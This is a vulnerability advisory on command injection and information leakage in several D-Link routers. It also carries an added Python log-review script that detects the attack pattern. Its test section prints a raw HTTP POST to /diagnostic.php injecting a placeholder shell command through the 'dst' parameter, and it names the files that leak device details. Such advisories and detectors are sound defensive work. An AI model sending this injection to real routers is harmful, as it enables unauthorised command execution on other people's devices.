Multiple D-Link Products Command Injection and Information Leakage Vulnerabilities
Release date:
Updated on:
Affected Systems:
D-Link DIR-300
D-Link DIR-600
D-Link DIR-645
D-Link DIR-110
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58938
D-Link is a world-renowned provider of network devices and solutions. Its products include a variety of router devices.
DIR-600/DIR-300 revB/DIR-815/DIR-645/DIR-412/DIR-456 contain multiple security vulnerabilities in their implementation that attackers can exploit to obtain sensitive information and execute arbitrary commands on the affected device.
1. OS command injection
Because the dst parameter is subject to neither input validation nor session validation, arbitrary shell commands can be injected and executed.
2. Information Leakage
The server banner makes certain types of devices easy to detect.
3. Information Leakage
Detailed device information can be obtained over the network.
<* Source: m-1-k-3
Link: http://cxsecurity.com/issue/WLB-2013040062
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

act=ping&dst=%26%20COMMAND%26
http://www.example.com/DevInfo.txt or http://www.example.com/version.txt
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.dlink.com/
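A log-review check for the request pattern described in this advisory, as an added example that is not part of the original advisory or any vendor code: it flags POSTs to /diagnostic.php whose dst value is not an IP address or hostname, and requests for DevInfo.txt or version.txt. The function names, the hostname allowlist and the sample requests are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Paths named in the advisory: the ping diagnostic and the two info-leak files.
DIAG_PATH = "/diagnostic.php"
LEAK_PATHS = {"/devinfo.txt", "/version.txt"}
# Assumption: a legitimate ping target is an IP literal or a DNS hostname.
LABEL = r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(LABEL + r"(\." + LABEL + r")*")

def dst_is_valid(value):
    """Allowlist check: True only for an IP literal or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME.fullmatch(value) is not None

def inspect_request(method, target, body=""):
    """Return a list of findings for one logged HTTP request."""
    findings = []
    path = urlsplit(target).path.lower()
    if path in LEAK_PATHS:
        findings.append("device-info file requested: " + path)
    if method.upper() == "POST" and path == DIAG_PATH:
        # parse_qs percent-decodes values, so %26 is a literal '&' when checked.
        params = parse_qs(body, keep_blank_values=True)
        if params.get("act") == ["ping"]:
            for dst in params.get("dst", [""]):
                if not dst_is_valid(dst):
                    findings.append("ping dst is not a host or IP: %r" % dst)
    return findings

# Constructed sample requests (method, target, body); not taken from real logs.
SAMPLES = [
    ("POST", "/diagnostic.php", "act=ping&dst=192.0.2.10"),
    ("POST", "/diagnostic.php", "act=ping&dst=%26%20COMMAND%26"),
    ("GET", "/DevInfo.txt", ""),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", inspect_request(*sample) or "ok")
```

The same allowlist in dst_is_valid is the kind of input check whose absence the description attributes the command injection to; it rejects anything that is not a bare address or hostname instead of trying to enumerate shell metacharacters.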